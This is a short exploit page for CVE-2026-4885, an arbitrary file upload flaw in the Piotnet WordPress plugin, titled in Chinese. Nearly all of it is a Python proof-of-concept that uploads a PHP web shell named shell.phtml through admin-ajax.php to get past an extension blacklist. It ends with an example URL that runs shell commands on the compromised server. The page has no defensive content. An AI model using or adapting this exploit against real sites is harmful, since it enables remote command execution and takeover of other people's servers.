CVE-2026-4885: Piotnet插件任意文件上传漏洞

import requests # Target configuration target_url = "http://example.com" upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload: A simple PHP webshell saved as .phtml to bypass blacklist # The blacklist blocks .php but often misses .phtml or .phar file_content = "<?php system($_GET['cmd']); ?>" files = { 'file': ('shell.phtml', file_content, 'application/octet-stream') } # Data required to trigger the vulnerable function data = { 'action': 'pafe_ajax_form_builder', 'form_data': '...' # Additional form data if required } try: response = requests.post(upload_endpoint, files=files, data=data) if response.status_code == 200: print("[+] File upload request sent successfully.") print("[+] Check the upload directory or response for the file path.") # Example execution: http://example.com/wp-content/uploads/2026/05/shell.phtml?cmd=whoami else: print("[-] Failed to send request.") except Exception as e: print(f"[!] Error: {e}")